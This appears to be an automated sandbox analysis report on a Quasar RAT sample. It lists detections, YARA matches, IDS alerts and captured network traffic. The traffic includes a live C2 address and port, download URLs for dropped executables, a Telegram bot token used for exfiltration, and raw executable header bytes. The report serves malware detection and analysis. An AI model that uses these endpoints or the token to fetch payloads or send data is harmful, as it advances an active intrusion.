Source: C:\Users\user\AppData\Roaming\d3d9_4.drv (copy)	ReversingLabs: Detection: 15%
Source: C:\Users\user\AppData\Roaming\is-SHGPV.tmp	ReversingLabs: Detection: 15%
Source: C:\Users\user\Downloads\BT.exe	ReversingLabs: Detection: 31%
Source: C:\Users\user\Downloads\ST.exe	ReversingLabs: Detection: 39%

Yara detected Quasar RAT

Source: Yara match	File source: 17.2.regsvr32.exe.1c3f0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.regsvr32.exe.2fa92de.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.regsvr32.exe.13839ac0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.regsvr32.exe.13839ac0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.regsvr32.exe.2bd12ae.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.regsvr32.exe.2bd12ae.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.regsvr32.exe.1c3f0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.regsvr32.exe.2fa92de.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000011.00000002.2540192670.0000000002FA8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2541753861.0000000003831000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2541753861.0000000003C12000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2544710877.000000001C3F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2539716605.0000000002BD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2543209302.0000000013831000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 2224, type: MEMORYSTR

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.6% probability

Machine Learning detection for dropped file

Source: C:\Users\user\Downloads\ST.exe

Joe Sandbox ML: detected

Source: C:\Users\user\AppData\Local\Temp\is-N9K57.tmp\BT.tmp

Registry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Gigantic Monkey_is1

Jump to behavior

Source: unknown	HTTPS traffic detected: 104.20.4.235:443 -> 192.168.2.10:49713 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49767 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 195.201.57.90:443 -> 192.168.2.10:49994 version: TLS 1.2

Source: lO5lV39HDj.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source:	Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.Thread\Release\net8.0\System.Threading.Thread.pdb source: lO5lV39HDj.exe, 00000001.00000002.2546798617.0000015A03E40000.00000004.10000000.00040000.00000000.sdmp
Source:	Binary string: System.Diagnostics.TraceSource.ni.pdb source: lO5lV39HDj.exe, 00000001.00000002.2542598060.0000015A02D11000.00000020.00001000.00020000.00000000.sdmp, lO5lV39HDj.exe, 00000001.00000002.2542478310.0000015A02CE0000.00000004.10000000.00040000.00000000.sdmp
Source:	Binary string: D:\a\_work\1\s\artifacts\obj\System.Numerics.Vectors\Release\net8.0\System.Numerics.Vectors.pdbSHA256Q source: lO5lV39HDj.exe, 00000001.00000002.2553504188.0000015A06160000.00000004.10000000.00040000.00000000.sdmp
Source:	Binary string: System.Windows.Forms.Primitives.ni.pdb source: lO5lV39HDj.exe, lO5lV39HDj.exe, 00000001.00000002.2545731427.0000015A03AE0000.00000004.10000000.00040000.00000000.sdmp, lO5lV39HDj.exe, 00000001.00000002.2551609505.0000015A05861000.00000020.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\a\_work\1\s\artifacts\obj\System.IO.FileSystem.DriveInfo\Release\net8.0-windows\System.IO.FileSystem.DriveInfo.pdb source: lO5lV39HDj.exe, lO5lV39HDj.exe, 00000001.00000002.2536034420.0000015A017F1000.00000020.00001000.00020000.00000000.sdmp
Source:	Binary string: 6C:\Users\user\AppData\Local\Temp\0nzyxcux\0nzyxcux.pdb source: powershell.exe, 00000004.00000002.1342379280.000002B796676000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: System.IO.FileSystem.DriveInfo.ni.pdb source: lO5lV39HDj.exe, lO5lV39HDj.exe, 00000001.00000002.2536034420.0000015A017F1000.00000020.00001000.00020000.00000000.sdmp
Source:	Binary string: /_/artifacts/obj/System.Drawing.Common/Release/net8.0/System.Drawing.Common.pdb source: lO5lV39HDj.exe, lO5lV39HDj.exe, 00000001.00000002.2552832686.0000015A05D40000.00000004.10000000.00040000.00000000.sdmp, lO5lV39HDj.exe, 00000001.00000002.2553181654.0000015A05EC1000.00000020.00001000.00020000.00000000.sdmp
Source:	Binary string: System.Windows.Forms.ni.pdb source: lO5lV39HDj.exe, 00000001.00000002.2547096108.0000015A03E80000.00000004.10000000.00040000.00000000.sdmp, lO5lV39HDj.exe, 00000001.00000002.2549741435.0000015A04B71000.00000020.00001000.00020000.00000000.sdmp
Source:	Binary string: System.ComponentModel.Primitives.ni.pdb source: lO5lV39HDj.exe, 00000001.00000002.2537212658.0000015A01960000.00000004.10000000.00040000.00000000.sdmp, lO5lV39HDj.exe, 00000001.00000002.2537029867.0000015A01941000.00000020.00001000.00020000.00000000.sdmp
Source:	Binary string: System.Drawing.Common.ni.pdb source: lO5lV39HDj.exe, lO5lV39HDj.exe, 00000001.00000002.2552832686.0000015A05D40000.00000004.10000000.00040000.00000000.sdmp, lO5lV39HDj.exe, 00000001.00000002.2553181654.0000015A05EC1000.00000020.00001000.00020000.00000000.sdmp
Source:	Binary string: /_/artifacts/obj/System.Windows.Forms.Primitives/Release/net8.0/System.Windows.Forms.Primitives.pdb source: lO5lV39HDj.exe, lO5lV39HDj.exe, 00000001.00000002.2545731427.0000015A03AE0000.00000004.10000000.00040000.00000000.sdmp, lO5lV39HDj.exe, 00000001.00000002.2551609505.0000015A05861000.00000020.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\a\_work\1\s\artifacts\obj\System.Collections\Release\net8.0\System.Collections.pdb source: lO5lV39HDj.exe, lO5lV39HDj.exe, 00000001.00000002.2544950241.0000015A039E0000.00000004.10000000.00040000.00000000.sdmp, lO5lV39HDj.exe, 00000001.00000002.2545060158.0000015A03A21000.00000020.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\a\_work\1\s\artifacts\obj\System.ComponentModel.TypeConverter\Release\net8.0\System.ComponentModel.TypeConverter.pdbSHA256m source: lO5lV39HDj.exe, 00000001.00000002.2553703942.0000015A06190000.00000004.10000000.00040000.00000000.sdmp
Source:	Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime\Release\net8.0\System.Runtime.pdbSHA256 source: lO5lV39HDj.exe, 00000001.00000002.2536927509.0000015A01930000.00000004.10000000.00040000.00000000.sdmp
Source:	Binary string: System.Security.Principal.Windows.ni.pdb source: lO5lV39HDj.exe, lO5lV39HDj.exe, 00000001.00000002.2545250432.0000015A03A60000.00000004.10000000.00040000.00000000.sdmp, lO5lV39HDj.exe, 00000001.00000002.2545423139.0000015A03A91000.00000020.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\a\_work\1\s\artifacts\obj\coreclr\windows.x64.Release\dlls\mscordac\mscordaccore.pdb source: lO5lV39HDj.exe, 00000001.00000000.1284026782.00007FF78F5D8000.00000002.00000001.01000000.00000004.sdmp
Source:	Binary string: /_/artifacts/obj/System.Resources.Extensions/Release/net8.0/System.Resources.Extensions.pdb source: lO5lV39HDj.exe, lO5lV39HDj.exe, 00000001.00000002.2553574496.0000015A06171000.00000020.00001000.00020000.00000000.sdmp
Source:	Binary string: /_/artifacts/obj/System.Drawing.Common/Release/net8.0/System.Drawing.Common.pdbSHA256 source: lO5lV39HDj.exe, 00000001.00000002.2552832686.0000015A05D40000.00000004.10000000.00040000.00000000.sdmp, lO5lV39HDj.exe, 00000001.00000002.2553181654.0000015A05EC1000.00000020.00001000.00020000.00000000.sdmp
Source:	Binary string: System.ComponentModel.EventBasedAsync.ni.pdb source: lO5lV39HDj.exe, 00000001.00000002.2546730732.0000015A03E20000.00000004.10000000.00040000.00000000.sdmp, lO5lV39HDj.exe, 00000001.00000002.2546471783.0000015A03E11000.00000020.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\a\_work\1\s\artifacts\obj\Microsoft.Win32.Primitives\Release\net8.0\Microsoft.Win32.Primitives.pdb source: lO5lV39HDj.exe, 00000001.00000002.2546297662.0000015A03DD0000.00000004.10000000.00040000.00000000.sdmp
Source:	Binary string: System.Collections.ni.pdb source: lO5lV39HDj.exe, lO5lV39HDj.exe, 00000001.00000002.2544950241.0000015A039E0000.00000004.10000000.00040000.00000000.sdmp, lO5lV39HDj.exe, 00000001.00000002.2545060158.0000015A03A21000.00000020.00001000.00020000.00000000.sdmp
Source:	Binary string: System.Private.CoreLib.ni.pdb source: lO5lV39HDj.exe, 00000001.00000002.2542880456.0000015A02D51000.00000020.00001000.00020000.00000000.sdmp, lO5lV39HDj.exe, 00000001.00000002.2538918360.0000015A01F00000.00000004.10000000.00040000.00000000.sdmp
Source:	Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.Loader\Release\net8.0\System.Runtime.Loader.pdb source: lO5lV39HDj.exe, 00000001.00000002.2536856455.0000015A01920000.00000004.10000000.00040000.00000000.sdmp
Source:	Binary string: System.Collections.Specialized.ni.pdb source: lO5lV39HDj.exe, 00000001.00000002.2538440372.0000015A01E80000.00000004.10000000.00040000.00000000.sdmp, lO5lV39HDj.exe, 00000001.00000002.2538222329.0000015A01E61000.00000020.00001000.00020000.00000000.sdmp
Source:	Binary string: System.ComponentModel.TypeConverter.ni.pdb source: lO5lV39HDj.exe, 00000001.00000002.2553703942.0000015A06190000.00000004.10000000.00040000.00000000.sdmp
Source:	Binary string: System.Runtime.InteropServices.ni.pdb source: lO5lV39HDj.exe, 00000001.00000002.2538679254.0000015A01EC1000.00000020.00001000.00020000.00000000.sdmp, lO5lV39HDj.exe, 00000001.00000002.2538522345.0000015A01EA0000.00000004.10000000.00040000.00000000.sdmp
Source:	Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading\Release\net8.0\System.Threading.pdb source: lO5lV39HDj.exe, 00000001.00000002.2538861845.0000015A01EE0000.00000004.10000000.00040000.00000000.sdmp, lO5lV39HDj.exe, 00000001.00000002.2542196154.0000015A02CA1000.00000020.00001000.00020000.00000000.sdmp
Source:	Binary string: System.Security.Claims.ni.pdb source: lO5lV39HDj.exe, 00000001.00000002.2545689921.0000015A03AC0000.00000004.10000000.00040000.00000000.sdmp, lO5lV39HDj.exe, 00000001.00000002.2542346113.0000015A02CC1000.00000020.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\a\_work\1\s\artifacts\obj\coreclr\windows.x64.Release\Corehost.Static\singlefilehost.pdb source: lO5lV39HDj.exe, 00000001.00000000.1283842349.00007FF78F3FD000.00000002.00000001.01000000.00000004.sdmp
Source:	Binary string: D:\a\_work\1\s\artifacts\obj\coreclr\System.Private.CoreLib\x64\Release\System.Private.CoreLib.pdb source: lO5lV39HDj.exe, 00000001.00000002.2542880456.0000015A02D51000.00000020.00001000.00020000.00000000.sdmp, lO5lV39HDj.exe, 00000001.00000002.2538918360.0000015A01F00000.00000004.10000000.00040000.00000000.sdmp
Source:	Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.TraceSource\Release\net8.0\System.Diagnostics.TraceSource.pdb source: lO5lV39HDj.exe, 00000001.00000002.2542598060.0000015A02D11000.00000020.00001000.00020000.00000000.sdmp, lO5lV39HDj.exe, 00000001.00000002.2542478310.0000015A02CE0000.00000004.10000000.00040000.00000000.sdmp
Source:	Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.Thread\Release\net8.0\System.Threading.Thread.pdbSHA256- source: lO5lV39HDj.exe, 00000001.00000002.2546798617.0000015A03E40000.00000004.10000000.00040000.00000000.sdmp
Source:	Binary string: D:\a\_work\1\s\artifacts\obj\System.ComponentModel.Primitives\Release\net8.0\System.ComponentModel.Primitives.pdb source: lO5lV39HDj.exe, 00000001.00000002.2537212658.0000015A01960000.00000004.10000000.00040000.00000000.sdmp, lO5lV39HDj.exe, 00000001.00000002.2537029867.0000015A01941000.00000020.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\a\_work\1\s\artifacts\obj\Microsoft.Win32.Primitives\Release\net8.0\Microsoft.Win32.Primitives.pdbSHA256 source: lO5lV39HDj.exe, 00000001.00000002.2546297662.0000015A03DD0000.00000004.10000000.00040000.00000000.sdmp
Source:	Binary string: /_/artifacts/obj/System.Windows.Forms/Release/net8.0/System.Windows.Forms.pdb source: lO5lV39HDj.exe, 00000001.00000002.2547096108.0000015A03E80000.00000004.10000000.00040000.00000000.sdmp, lO5lV39HDj.exe, 00000001.00000002.2549741435.0000015A04B71000.00000020.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.Loader\Release\net8.0\System.Runtime.Loader.pdbSHA256 source: lO5lV39HDj.exe, 00000001.00000002.2536856455.0000015A01920000.00000004.10000000.00040000.00000000.sdmp
Source:	Binary string: 6C:\Users\user\AppData\Local\Temp\0nzyxcux\0nzyxcux.pdbhP source: powershell.exe, 00000004.00000002.1342379280.000002B796676000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: D:\a\_work\1\s\artifacts\obj\System.ComponentModel.TypeConverter\Release\net8.0\System.ComponentModel.TypeConverter.pdb source: lO5lV39HDj.exe, 00000001.00000002.2553703942.0000015A06190000.00000004.10000000.00040000.00000000.sdmp
Source:	Binary string: D:\a\_work\1\s\artifacts\obj\System.Security.Claims\Release\net8.0\System.Security.Claims.pdb source: lO5lV39HDj.exe, 00000001.00000002.2545689921.0000015A03AC0000.00000004.10000000.00040000.00000000.sdmp, lO5lV39HDj.exe, 00000001.00000002.2542346113.0000015A02CC1000.00000020.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\a\_work\1\s\artifacts\obj\System.Numerics.Vectors\Release\net8.0\System.Numerics.Vectors.pdb source: lO5lV39HDj.exe, 00000001.00000002.2553504188.0000015A06160000.00000004.10000000.00040000.00000000.sdmp
Source:	Binary string: System.Threading.ni.pdb source: lO5lV39HDj.exe, 00000001.00000002.2538861845.0000015A01EE0000.00000004.10000000.00040000.00000000.sdmp, lO5lV39HDj.exe, 00000001.00000002.2542196154.0000015A02CA1000.00000020.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime\Release\net8.0\System.Runtime.pdb source: lO5lV39HDj.exe, 00000001.00000002.2536927509.0000015A01930000.00000004.10000000.00040000.00000000.sdmp
Source:	Binary string: System.Resources.Extensions.ni.pdb source: lO5lV39HDj.exe, lO5lV39HDj.exe, 00000001.00000002.2553574496.0000015A06171000.00000020.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.InteropServices\Release\net8.0\System.Runtime.InteropServices.pdb source: lO5lV39HDj.exe, 00000001.00000002.2538679254.0000015A01EC1000.00000020.00001000.00020000.00000000.sdmp, lO5lV39HDj.exe, 00000001.00000002.2538522345.0000015A01EA0000.00000004.10000000.00040000.00000000.sdmp
Source:	Binary string: D:\a\_work\1\s\artifacts\obj\System.ComponentModel.EventBasedAsync\Release\net8.0\System.ComponentModel.EventBasedAsync.pdb source: lO5lV39HDj.exe, 00000001.00000002.2546730732.0000015A03E20000.00000004.10000000.00040000.00000000.sdmp, lO5lV39HDj.exe, 00000001.00000002.2546471783.0000015A03E11000.00000020.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\a\_work\1\s\artifacts\obj\System.Collections.Specialized\Release\net8.0\System.Collections.Specialized.pdb source: lO5lV39HDj.exe, 00000001.00000002.2538440372.0000015A01E80000.00000004.10000000.00040000.00000000.sdmp, lO5lV39HDj.exe, 00000001.00000002.2538222329.0000015A01E61000.00000020.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\a\_work\1\s\artifacts\obj\System.Drawing.Primitives\Release\net8.0-windows\System.Drawing.Primitives.pdb source: lO5lV39HDj.exe, 00000001.00000002.2537916593.0000015A01E10000.00000004.10000000.00040000.00000000.sdmp, lO5lV39HDj.exe, 00000001.00000002.2537711872.0000015A01DF1000.00000020.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\a\_work\1\s\artifacts\obj\System.Security.Principal.Windows\Release\net8.0-windows\System.Security.Principal.Windows.pdb source: lO5lV39HDj.exe, lO5lV39HDj.exe, 00000001.00000002.2545250432.0000015A03A60000.00000004.10000000.00040000.00000000.sdmp, lO5lV39HDj.exe, 00000001.00000002.2545423139.0000015A03A91000.00000020.00001000.00020000.00000000.sdmp
Source:	Binary string: System.Drawing.Primitives.ni.pdb source: lO5lV39HDj.exe, 00000001.00000002.2537916593.0000015A01E10000.00000004.10000000.00040000.00000000.sdmp, lO5lV39HDj.exe, 00000001.00000002.2537711872.0000015A01DF1000.00000020.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\zlib-dll\Release\isunzlib.pdb source: BT.tmp, 0000000D.00000003.1508966158.00000000034F8000.00000004.00001000.00020000.00000000.sdmp, BT.tmp, 0000000D.00000003.1506501307.00000000031C0000.00000004.00001000.00020000.00000000.sdmp

Source: C:\Users\user\Downloads\ST.exe	Code function: 4x nop then fld dword ptr [021F619Ch]	20_2_021F5A70
Source: C:\Users\user\Downloads\ST.exe	Code function: 4x nop then mov eax, dword ptr [ebp+08h]	20_2_021F5A70
Source: C:\Users\user\Downloads\ST.exe	Code function: 4x nop then fld qword ptr [021F5A40h]	20_2_021F5455
Source: C:\Users\user\Downloads\ST.exe	Code function: 4x nop then lea esp, dword ptr [ebp-0Ch]	20_2_021F4215

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2035595 - Severity 1 - ET MALWARE Generic AsyncRAT/zgRAT Style SSL Cert : 185.147.124.146:4782 -> 192.168.2.10:49992
Source: Network traffic	Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.10:49767 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.10:49948 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.10:49833 -> 149.154.167.220:443

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\System32\regsvr32.exe	Network Connect: 185.147.124.146 4782
Source: C:\Windows\System32\regsvr32.exe	Network Connect: 195.201.57.90 443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: 185.147.124.146

Connects to a pastebin service (likely for C&C)

Source: unknown

DNS query: name: pastebin.com

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Yara detected Generic Downloader

Source: Yara match	File source: 17.2.regsvr32.exe.1c3f0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.regsvr32.exe.13839ac0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.regsvr32.exe.2bd12ae.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.regsvr32.exe.2fa92de.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000011.00000002.2544710877.000000001C3F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

Source: global traffic

TCP traffic: 192.168.2.10:49992 -> 185.147.124.146:4782

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 05 Feb 2025 07:03:41 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Tue, 04 Feb 2025 11:17:32 GMTETag: "ed0460-62d4f27c25525"Accept-Ranges: bytesContent-Length: 15533152Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 1d 63 df 63 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 08 00 00 e6 ec 00 00 08 00 00 00 00 00 00 0e 04 ed 00 00 20 00 00 00 20 ed 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 ed 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 c0 03 ed 00 4b 00 00 00 00 20 ed 00 2c 04 00 00 00 00 00 00 00 00 00 00 00 f0 ec 00 60 14 00 00 00 40 ed 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 14 e4 ec 00 00 20 00 00 00 e6 ec 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 2c 04 00 00 00 20 ed 00 00 06 00 00 00 e8 ec 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 40 ed 00 00 02 00 00 00 ee ec 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 03 ed 00 00 00 00 00 48 00 00 00 02 00 05 00 38 49 ec 00 88 ba 00 00 03 00 02 00 5e 01 00 06 90 f4 01 00 a6 54 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b 0c 0d 0e 0f 10 00 00 00 00 02 00 00 00 04 00 00 00 05 00 00 00 07 00 00 00 09 00 00 00 0b 00 00 00 00 00 00 00 cc ed 00 00 51 31 00 00 ef f6 00 00 91 68 00 00 d4 a6 00 00 55 46 00 00 8b 9c 00 00 09 ef 00 00 cd e5 00 00 54 2e 00 00 f7 62 00 00 5d 4d 00 00 86 f5 00 00 58 a2 00 00 52 49 00 00 da aa 00 00 ca bc 00 00 99 5b 00 00 59 cd 00 00 e6 2c 00 00 3f 79 00 00 c7 75 00 00 eb 34 00 00 52 7a 00 00 f4 f2 00 00 84 27 00 00 f6 96 00 00 0e ec 00 00 a8 94 00 00 82 8c 00 00 c2 b7 00 00 10 34 00 00 bf ab 00 00 b1 ec 00 00 1f 0d 00 00 74 fa 00 00 a7 48 00 00 02 71 00 00 8b a0 00 00 f9 1b 00 00 57 4d 00 00 a6 19 00 00 d9 ca 00 00 0d 96 00 00 23 89 00 00 be fa 00 00 92 3d 00 00 2e 5e 00 00 19 1b 00 00 98 c0 00 00 1c 50 00 00 1e ad 00 00 6e 5c 00 00 2c d2 00 00 9f 6d 00 00 05 78 00 00 65 fc 00 00 9d 7c 00 00 9c 75 00 00 4f 7f 00 00 5d af 00 00 7c b0 00 00 61 5a 00 00 4b 59 00 00 90 76 00 00 e7 2e 00 00 9d a1 00 00 d5 08 00 00 3
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 05 Feb 2025 07:03:41 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Sat, 01 Feb 2025 10:01:08 GMTETag: "333d92-62d11bcf3bf8b"Accept-Ranges: bytesContent-Length: 3358098Content-Type: application/x-msdos-programData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 08 00 9e 13 90 3d 00 00 00 00 00 00 00 00 e0 00 8f 81 0b 01 02 19 00 50 01 00 00 6a 02 00 00 00 00 00 78 64 01 00 00 10 00 00 00 70 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 06 00 00 00 05 00 00 00 00 00 00 00 00 60 04 00 00 04 00 00 00 00 00 00 02 00 00 80 00 00 10 00 00 40 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 e0 01 00 9e 0f 00 00 00 10 02 00 7c 49 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 e3 01 00 4c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f8 43 01 00 00 10 00 00 00 44 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 69 74 65 78 74 00 00 e8 0b 00 00 00 60 01 00 00 0c 00 00 00 48 01 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 9c 0d 00 00 00 70 01 00 00 0e 00 00 00 54 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 73 73 00 00 00 00 4c 57 00 00 00 80 01 00 00 00 00 00 00 62 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 9e 0f 00 00 00 e0 01 00 00 10 00 00 00 62 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 08 00 00 00 00 f0 01 00 00 00 00 00 00 72 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 72 64 61 74 61 00 00 18 00 00 00 00 00 02 00 00 02 00 00 00 72 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 7c 49 02 00 00 10 02 00 00 4a 02 00 00 74 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 02 00 00 00 00 00 00 26 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Source: global traffic	HTTP traffic detected: POST /bot7792680794:AAGUF4w-RxZOjTvV1P2Y7PLy9_P8gING-UU/sendMessage HTTP/1.1Host: api.telegram.orgContent-Type: application/x-www-form-urlencodedContent-Length: 254
Source: global traffic	HTTP traffic detected: POST /bot7792680794:AAGUF4w-RxZOjTvV1P2Y7PLy9_P8gING-UU/sendMessage HTTP/1.1Host: api.telegram.orgContent-Type: application/x-www-form-urlencodedContent-Length: 201
Source: global traffic	HTTP traffic detected: POST /bot7792680794:AAGUF4w-RxZOjTvV1P2Y7PLy9_P8gING-UU/sendMessage HTTP/1.1Host: api.telegram.orgContent-Type: application/x-www-form-urlencodedContent-Length: 201
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global traffic	HTTP traffic detected: GET /json/8.46.123.189 HTTP/1.1Host: ip-api.com
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global traffic	HTTP traffic detected: GET /json/8.46.123.189 HTTP/1.1Host: ip-api.com
Source: global traffic	HTTP traffic detected: GET /json/8.46.123.189 HTTP/1.1Host: ip-api.com
Source: global traffic	HTTP traffic detected: GET /TeamBuild/ST.exe HTTP/1.1Host: 89.23.99.249
Source: global traffic	HTTP traffic detected: GET /TeamBuild/BT.exe HTTP/1.1Host: 89.23.99.249
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
